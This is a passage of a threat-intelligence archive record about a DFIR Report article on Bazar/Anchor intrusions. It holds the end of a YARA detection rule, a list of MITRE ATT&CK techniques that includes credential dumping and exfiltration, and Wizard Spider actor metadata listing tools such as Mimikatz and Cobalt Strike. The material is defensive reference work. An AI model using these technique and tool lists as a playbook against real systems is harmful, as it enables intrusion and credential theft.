xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsSetting\r\n$s14 = \"wrong protocol type\" fullword ascii /* Goodware String - occured 567 times */\r\n$s15 = \"network reset\" fullword ascii /* Goodware String - occured 567 times */\r\n$s16 = \"owner dead\" fullword ascii /* Goodware String - occured 567 times */\r\n$s17 = \"connection already in progress\" fullword ascii /* Goodware String - occured 567 times */\r\n$s18 = \"network down\" fullword ascii /* Goodware String - occured 567 times */\r\n$s19 = \"protocol not supported\" fullword ascii /* Goodware String - occured 568 times */\r\n$s20 = \"connection aborted\" fullword ascii /* Goodware String - occured 568 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n( pe.imphash() == \"9859b7a32d1227be2ca925c81ae9265e\" or 8 of them )\r\n}\r\nMITRE\r\nSpearphishing Link - T1566.002\r\nCommand-Line Interface - T1059\r\nMalicious File - T1204.002\r\nScheduled Task - T1053.005\r\nUser Execution - T1204\r\nProcess Injection - T1055\r\nDNS - T1071.004\r\nCommonly Used Port - T1043\r\nApplication Layer Protocol - T1071\r\nExfiltration Over C2 Channel - T1041\r\nSMB/Windows Admin Shares - T1021.002\r\nDomain Trust Discovery - T1482\r\nDomain Account - T1087.002\r\nRemote System Discovery - T1018\r\nSystem Information Discovery - T1082\r\nOS Credential Dumping - T1003\r\nInternal case #1017\r\nSource: https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor" ], "report_names": [ "bazar-drops-the-anchor" ], "threat_actors": [ { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434894, "ts_updated_at": 1775826740, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2038a0eba536a55962c210b05d6ef146bd28ce28.pdf", "text": "https://archive.orkl.eu/2038a0eba536a55962c210b05d6ef146bd28ce28.txt", "img": "https://archive.orkl.eu/2038a0eba536a55962c210b05d6ef146bd28ce28.jpg" } }